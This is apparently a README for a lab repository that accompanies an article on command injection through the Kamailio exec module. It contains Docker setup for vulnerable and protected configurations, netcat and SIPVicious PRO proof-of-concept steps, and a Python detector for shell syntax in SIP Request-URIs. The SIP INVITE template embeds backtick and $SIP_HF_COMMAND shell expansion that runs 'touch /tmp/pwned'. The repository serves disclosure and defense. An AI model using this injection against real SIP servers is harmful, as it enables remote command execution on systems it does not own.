This repository includes examples referenced from https://www.rtcsec.com/article/kamailio-exec-module-considered-harmful.
Note: depending on your Docker setup, you might need to use the command `docker compose` instead of `docker-compose`.
To run the vulnerable version of the Kamailio configuration:

```
docker-compose run kamailio-vulnerable
```

To run the protected version:

```
docker-compose run kamailio-protected
```
We give two examples of exploitation: one uses netcat, the other uses SIPVicious PRO, which is commercially available.
- Start monitoring the `/tmp` directory:

  ```
  docker-compose exec kamailio-vulnerable watch ls -alh /tmp
  ```

- To run the PoC use the following instruction:

  ```
  cat poc.txt | nc 127.0.0.1 5060
  ```

- Observe the result in the directory listing.
When making use of the stable version of SIPVicious PRO, one may use the repeater tool to reproduce this issue as follows:

- Save the following template as `inviterequest.tpl` (or switch to the `svpro` directory in this repository):

  ```
  INVITE sip:`$SIP_HF_COMMAND`@127.0.0.1 SIP/2.0
  Command: {{ ENV "COMMAND" }}
  Via: SIP/2.0/{{.AddrFamily}} {{.LocalAddr}};rport;branch=z9hG4bK-{{.Branch}}
  Max-Forwards: 70
  From: {{.FromVal}}
  To: {{.ToVal}}
  Call-ID: {{.CallID}}
  CSeq: {{.CSeq}} INVITE
  Contact: {{.ContactVal}}
  Content-Length: {{.Body | len}}
  Content-Type: application/sdp

  {{.Body -}}
  ```

- Start monitoring the `/tmp` directory:

  ```
  docker-compose exec kamailio-vulnerable watch ls -alh /tmp
  ```

- Run the PoC as follows:

  ```
  COMMAND="touch /tmp/pwned" sipvicious sip utils repeater udp://127.0.0.1:5060 -m invite
  ```

- Observe the result in the directory listing.
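Both PoCs above rely on the same trick: the Request-URI user part carries shell expansion syntax (backticks and a `$SIP_HF_...` variable reference) that the exec module hands to a shell. The following detector is an added example, not code from this repository or from the article; it scans constructed sample SIP messages, extracts the Request-URI user part and flags shell syntax in it, checking the percent-decoded form as well so encoded backticks do not slip past. The verdict levels and the sample messages are the example's own choices.

```python
import re
from urllib.parse import unquote

# Shell syntax that /bin/sh -c would expand if the user part were spliced
# into a command line: backticks, $(...), ${...}, $NAME.
HIGH_RISK = re.compile(r"`|\$\(|\$\{|\$[A-Za-z_]")
# Other metacharacters; ';' and '&' are legal in a SIP user part (RFC 3261),
# so on their own they only earn a medium verdict (expect false positives).
SHELL_META = re.compile(r"[;|&<>()\n]")
REQUEST_LINE = re.compile(r"^([A-Z]+) sips?:(?:([^@\s]+)@)?\S+ SIP/2\.0$")

# Constructed sample messages (not captured traffic). The second mirrors the
# repeater template above; the third is the same payload percent-encoded.
SAMPLES = [
    b"INVITE sip:alice@127.0.0.1 SIP/2.0\r\nCall-ID: a1\r\n\r\n",
    b"INVITE sip:`$SIP_HF_COMMAND`@127.0.0.1 SIP/2.0\r\nCommand: touch /tmp/pwned\r\n\r\n",
    b"INVITE sip:%60%24SIP_HF_COMMAND%60@127.0.0.1 SIP/2.0\r\n\r\n",
    b"INVITE sip:+15551234;npdi@127.0.0.1 SIP/2.0\r\n\r\n",
    b"SIP/2.0 200 OK\r\nCall-ID: a1\r\n\r\n",
]


def request_uri_user(msg: bytes):
    """Return the Request-URI user part ('' if absent), or None when the
    first line is not a SIP request line (responses, garbage)."""
    first = msg.split(b"\r\n", 1)[0].decode("latin-1", "replace")
    m = REQUEST_LINE.match(first)
    if not m:
        return None
    return m.group(2) or ""


def classify(msg: bytes) -> str:
    """'ignore' for non-requests, otherwise 'high', 'medium' or 'clean'."""
    user = request_uri_user(msg)
    if user is None:
        return "ignore"
    forms = (user, unquote(user))  # raw and percent-decoded
    if any(HIGH_RISK.search(f) for f in forms):
        return "high"
    if any(SHELL_META.search(f) for f in forms):
        return "medium"
    return "clean"


def scan(msgs):
    """Classify each message; returns [(verdict, user_part), ...]."""
    return [(classify(m), request_uri_user(m)) for m in msgs]


if __name__ == "__main__":
    for verdict, user in scan(SAMPLES):
        print(f"{verdict:7} {user!r}")
```

Run against the two PoC messages this repository sends, it reports the `$SIP_HF_COMMAND` user part as high risk; the protected configuration should be validating this part before anything reaches the exec module.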
One may also make use of a new experimental tool called `iterator`, which can act like a scanner or fuzzer to identify this vulnerability semi-automatically.

The image is already available on the Docker registry. If you would like to build it, you may do so as follows:

```
docker-compose build
```